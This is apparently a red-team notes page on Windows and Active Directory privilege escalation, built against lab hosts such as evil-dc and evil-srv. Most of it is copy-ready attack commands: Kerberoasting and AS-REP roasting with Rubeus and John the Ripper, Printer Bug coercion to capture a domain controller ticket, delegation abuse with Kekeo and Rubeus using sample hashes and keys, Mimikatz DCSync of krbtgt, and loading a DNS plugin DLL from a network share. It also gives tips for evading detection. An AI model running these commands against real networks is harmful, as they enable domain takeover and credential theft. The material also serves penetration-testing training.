Privilege Escalation

Local Privilege Escalation

  • Missing patches

  • Automated deployment and AutoLogon passwords in clear text

  • AlwaysInstallElevated (Any user can run MSI as SYSTEM)

  • Misconfigured Services

  • DLL Hijacking and more

  • NTLM Relaying a.k.a. Won't Fix

Tools for complete coverage

  • PowerUp: https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

  • Privesc: https://github.com/enjoiz/Privesc

  • winPEAS: https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

Service Issues using PowerUp.p1

PowerUp.ps1 Invoke-AllChecks

Import-Module .\PowerUp.ps1
Invoke-AllChecks

Get services with unquoted paths and a space in their name

Get-ServiceUnquoted -Verbose

Get services where the current user can write to its binary path or change arguments to the binary

Get-ModifiableServiceFile -Verbose

Get the services whose configuration current user can modify

Get-ModifiableService -Verbose

privesc.ps1

Import-Module .\privesc.ps1
Invoke-PrivEsc

winPEAS-ng

.\winPEASx64.exe

Feature Abuse

  • Features abuse are awesome as there are seldom patches for them and they are not the focus of security teams!

  • One of my favorite features abuse is targeting enterprise applications which are not built keeping security in mind

  • On Windows, many enterprise applications need either Administrative privileges or SYSTEM privileges making them a great avenue for privilege escalation

Kerberoast

  • Offline cracking of service account passwords.

  • The Kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of service account. This makes it possible to request a ticket and do offline password attack

  • Because (non-machine) service account passwords are not frequently changed, this has become a very popular attack!

  • Request tickets one at a time to avoid chance of detection

Find user accounts used as Service accounts

PV: Get-DomainUser -SPN
ADM: Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Use Rubeus to list Kerberoast stats

Rubeus.exe kerberoast /stats

Use Rubeus to request a TGS

  • Request tickets one at a time to avoid chance of detection

Rubeus.exe kerberoast /user:svcadmin /simple

To avoid detections based on Encryption Downgrade for Kerberos EType (used by likes of MDI - 0x17 stands for rc4-hmac), look for Kerberoastable accounts that only support RC4_HMAC

Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec

Kerberoast all possible accounts

Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt

Crack ticket using John the Ripper

john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt

Targeted Kerberoasting - AS-REP

  • If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled i.e. Kerberos preauth is disabled, it is possible to grab user's crackable AS-REP and brute-force it offline

  • With sufficient rights (GenericWrite or GenericAll), Kerberos preauth can be forced disabled as well

Enumerating accounts with Kerberos Preauth disabled

PV: Get-DomainUser -PreauthNotRequired -Verbose
ADM: Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Force disable Kerberos Preauth:

Enumerate the permissions for RDPUsers on ACLs

PV: Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
PV: Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} -Verbose
PV: Get-DomainUser -PreauthNotRequired -Verbose

Request encrypted AS-REP for offline brute-force

Get-ASREPHash -UserName VPNUser -Verbose

To enumerate all users with Kerberos preauth disabled and request a hash

Invoke-ASREPRoast -Verbose

Crack hashes offline with John The Ripper

john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\asrephashes.txt

Set SPN

  • With enough rights (GenericAll/GenericWrite), a target user's SPN can be set to anything (unique in the domain)

  • We can then request a TGS without special privileges. The TGS can then be "Kerberoasted"

Enumerate the permissions for RDPUsers on ACLs using PowerView:

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Check if the user already has a SPN:

PV: Get-DomainUser -Identity supportuser | select serviceprincipalname
ADM: Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName

Set a SPN for the user (must be unique for the domain)

PV: Set-DomainObject -Identity support1user -Set @{serviceprincipalname=‘ecorp/whatever1'}
ADM: Set-ADUser -Identity support1user -ServicePrincipalNames @{Add=‘ecorp/whatever1'}

Kerberoast the user

Rubeus.exe kerberoast /outfile:targetedhashes.txt
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt

Kerberos Delegation

  • Kerberos Delegation allows to "reuse the end-user credentials to access resources hosted on a different server"

  • This is typically useful in multi-tier service or applications where Kerberos Double Hop is required

  • For example, users authenticates to a web server and web server makes requests to a database server. The web server can request access to resources (all or some resources depending on the type of delegation) on the database server as the user and not as the web server's service account

  • Please note that, for the above example, the service account for web service must be trusted for delegation to be able to make requests as a user

  • A user provides credentials to the Domain Controller.

  • The DC returns a TGT.

  • The user requests a TGS for the web service on Web Server.

  • The DC provides a TGS.

  • The user sends the TGT and TGS to the web server

  • The web server service account use the user's TGT to request a TGS for the database server from the DC

  • The web server service account connects to the database server as the user

  • There are two types of Kerberos Delegation:

    • General/Basic or Unconstrained Delegation which allows the first hop server (web server in our example) to request access to any service on any computer in the domain

    • Constrained Delegation which allows the first hop server to request access only to specified services on specified computers. If the user is not using Kerberos authentication to authenticate to the first hop server, Windows offers Protocol Transition to transition the request to Kerberos

  • Please note that in both types of delegations, a mechanism is required to impersonate the incoming user and authenticate to the second hop server as the user

Unconstrained Delegation

  • When set for a particular service account, unconstrained delegation allows delegation to any service to any resource on the domain as a user

  • When unconstrained delegation is enabled, the DC places user's TGT inside TGS (Step 4 in the previous diagram). When presented to the server with unconstrained delegation, the TGT is extracted from TGS and stored in LSASS. This way the server can reuse the user's TGT to access any other resource as the user

  • This could be used to escalate privileges in case we can compromise thecomputer with unconstrained delegation and a Domain Admin connects to that machine

Discover domain computers which have unconstrained delegation enabled

PV: Get-DomainComputer -UnConstrained
ADM: Get-ADComputer -Filter {TrustedForDelegation -eq $True}
ADM: Get-ADUser -Filter {TrustedForDelegation -eq $True}

Compromise the server(s) where Unconstrained delegation is enabled

  • We must trick or wait for a domain admin to connect a service on appsrv

  • Now, if the command is run again:

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

  • The DA token could be reused:

Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\appadmin\Documents\user1\[0;2ceb8b3][email protected]"'

Printer Bug

  • How do we trick a high privilege user to connect to a machine with Unconstrained Delegation? The Printer Bug!

  • A feature of MS-RPRN which allows any domain user (Authenticated User) can force any machine (running the Spooler service) to connect to second a machine of the domain user's choice

  • We can force the evil-dc to connect to evil-srv by abusing the Printer bug

We can capture the TGT of evil-dc$ by using Rubeus on evil-srv:

Rubeus.exe monitor /interval:5 /nowrap

  • And after that run MS-RPRN.exe (https://github.com/leechristensen/SpoolSample) on the student VM:

MS-RPRN.exe \\evil-dc.livecorp.evilcorp.local \\evil-srv.livecorp.evilcorp.local

Copy the base64 encoded TGT, remove extra spaces (if any):

Rubeus.exe ptt /ticket:

  • Once the ticket is injected, run DCSync:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:ecorp\krbtgt"'

If you are attacking from a Linux machine, check out Coercer (https://github.com/p0dalirius/Coercer) for other MS protocols that can be abused for coercion

Constrained Delegation

  • Constrained Delegation when enabled on a service account, allows access only to specified services on specified computers as a user.

  • A typical scenario where constrained delegation is used - A user authenticates to a web service without using Kerberos and the web service makes requests to a database server to fetch results based on the user's authorization.

  • To impersonate the user, Service for User (S4U) extension is used which provides two extensions:

    • Service for User to Self (S4U2self) - Allows a service to obtain a forwardable TGS to itself on behalf of a user.

    • Service for User to Proxy (S4U2proxy) - Allows a service to obtain a TGS to a second service on behalf of a user.

  • To impersonate the user, Service for User (S4U) extension is used which provides two extensions:

    • Service for User to Self (S4U2self) - Allows a service to obtain a forwardable TGS to itself on behalf of a user with just the user principal name without supplying a password. The service account must have the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION - T2A4D UserAccountControl attribute.

    • Service for User to Proxy (S4U2proxy) - Allows a service to obtain a TGS to a second service on behalf of a user. Which second service? This is controlled by msDS-AllowedToDelegateTo attribute. This attribute contains a list of SPNs to which the user tokens can be forwarded.

with Protocol Transition

  • A user - Joe, authenticates to the web service (running with service account websvc) using a non-Kerberos compatible authentication mechanism.

  • The web service requests a ticket from the Key Distribution Center (KDC) for Joe's account without supplying a password, as the websvc account.

  • The KDC checks the websvc userAccountControl value for the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION attribute, and that Joe's account is not blocked for delegation. If OK it returns a forwardable ticket for Joe's account (S4U2Self).

  • The service then passes this ticket back to the KDC and requests a service ticket for the CIFS/dcorp-mssql.dollarcorp.moneycorp.local service.

  • The KDC checks the msDS-AllowedToDelegateTo field on the websvc account. If the service is listed it will return a service ticket for dcorp-mssql (S4U2Proxy).

  • The web service can now authenticate to the CIFS on evil-mssql as Joe using the supplied TGS.

To abuse constrained delegation in above scenario, we need to have access to the websvc account. If we have access to that account, it is possible to access the services listed in msDS-AllowedToDelegateTo of the websvc account as ANY user

Enumerate users and computers with constrained delegation enabled

PV: Get-DomainUser -TrustedToAuth
PV: Get-DomainComputer -TrustedToAuth
ADM: Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Abusing with Kekeo

  • Either plaintext password or NTLM hash/AES keys is required. We already have access to websvc's hash from evil-srv

Using asktgt from Kekeo, we request a TGT

kekeo# tgt::ask /user:websvc /domain:livecorp.evilcorp.local /rc4:cc098f204c5887eaa8253e7c2749156f

Using s4u from Kekeo, we request a TGS

kekeo# tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/evil-mssql.livecorp.evilcorp.LOCAL

Using mimikatz, inject the ticket:

Invoke-Mimikatz -Command '"kerberos::ptt [email protected]@LIVECORP.EVILCORP.LOCAL_cifs~evil-mssql.livecorp.evilcorp.LOCAL@LIVECORP.EVILCORP.LOCAL.kirbi"'

ls \\evil-mssql.livecorp.evilcorp.local\c$

Abusing with Rubeus

We can use the following command (We are requesting a TGT and TGS in a single command):

Rubeus.exe s4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:CIFS/evil-mssql.livecorp.evilcorp.LOCAL /ptt

ls \\evil-mssql.livecorp.evilcorp.local\c$

  • Another interesting issue in Kerberos is that the delegation occurs not only for the specified service but for any service running under the same account. There is no validation for the SPN specified.

  • This is huge as it allows access to many interesting services when the delegation may be for a non-intrusive service!

Abusing with Kekeo

  • Either plaintext password or NTLM hash is required. If we have access to evil-srv hash

Using asktgt from Kekeo, we request a TGT:

kekeo# tgt::ask /user:evil-srv$ /domain:livecorp.evilcorp.local /rc4:1fadb1b13edbc5a61cbdc389e6f34c67

Using s4u from Kekeo_one (no SNAME validation):

kekeo# tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:time/evil-dc.livecorp.evilcorp.LOCAL|ldap/evil-dc.livecorp.evilcorp.LOCAL

Using mimikatz:

Invoke-Mimikatz -Command '"kerberos::ptt [email protected]@LIVECORP.
EVILCORP.LOCAL_ldap~evil-dc.livecorp.evilcorp.LOCAL@LIVECORP.EVILCORP.LOCAL_ALT.kirbi"'

Invoke-Mimikatz -Command '"lsadump::dcsync /user:livecorp\krbtgt"'

Abusing with Rubeus

We can use the following command (We are requesting a TGT and TGS in a single command):

Rubeus.exe s4u /user:evil-srv$ /aes256:db7bd8e34fada016eb0e292816040a1bf4eeb25cd3843e041d0278d30dc1b445 /impersonateuser:Administrator /msdsspn:time/evil-dc.live.evilcorp.LOCAL /altservice:ldap /ptt

  • After injection we can run DCSync

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Resource-based Constrained Delegation

  • This moves delegation authority to the resource/service administrator.

  • Instead of SPNs on msDs-AllowedToDelegatTo on the front-end service like web service, access in this case is controlled by security descriptor of msDS-AllowedToActOnBehalfOfOtherIdentity (visible as PrincipalsAllowedToDelegateToAccount) on the resource/service like SQL Server service.

  • That is, the resource/service administrator can configure this delegation whereas for other types, SeEnableDelegation privileges are required which are, by default, available only to Domain Admins.

  • To abuse RBCD in the most effective form, we just need two privileges.

    1. Write permissions over the target service or object to configure msDS-AllowedToActOnBehalfOfOtherIdentity.

    2. Control over an object which has SPN configured (like admin access to a domain joined machine or ability to join a machine to domain - ms-DS-MachineAccountQuota is 10 for all domain users)

  • We already have admin privileges on student VMs that are domain joined machines.

  • Enumeration would show that the user 'ciadmin' has Write permissions over the evil-ws machine!

Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}

Using the ActiveDirectory module, configure RBCD on evil-ws for user machines:

$comps = 'user1$','user2$' Set-ADComputer -Identity evil-ws -PrincipalsAllowedToDelegateToAccount $comps

Now, let's get the privileges of evil-ws$ by extracting its AES keys:

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Use the AES key of evil-ws$ with Rubeus and access evil-ws as ANY user we want:

Rubeus.exe s4u /user:evil-ws$ /aes256:d1027fbaf7faad598aaeff08989387592c0d8e0201ba453d83b9e6b7fc7897c2 /msdsspn:http/evil-ws /impersonateuser:administrator /ptt

winrs -r:evil-dc cmd.exe

DNS Admins

  • It is possible for members of the DNSAdmins group to load an arbitrary DLL with the privileges of dns.exe (SYSTEM)

  • In case the DC also serves as DNS, this will provide escalation to DA

  • Requires privileges to restart the DNS service

Enumerate members of DNSAdmins group

PV: Get-NetGroupMember -GroupName "DNSAdmins"
ADM: Get-ADGroupMember -Identity DNSAdmins

Using DNSAdmins user, configure DLL using dnscmd.exe (needs RSAT DNS):

dnscmd evil-dc /config /serverlevelplugindll \\172.16.100.12\mimilib.dll

OR using DNSServer module (needs RSAT DNS):

$dnsettings = Get-DnsServerSetting -ComputerName dcorp-dc -Verbose -All

$dnsettings.ServerLevelPluginDll = "\\172.16.100.12\mimilib.dll"

Set-DnsServerSestting -InputObject $dnsettings -ComputerName evil-dc -Verbose

Restart dns service

sc \\evil-dc stop dns
sc \\evil-dc start dns

  • By default the mimilib.dll logs all DNS queries to C:\Windows\System32\kiwidns.log

  • Edit kdns.c to execute custom payload

PreviousAD EnumerationNextTools

Last updated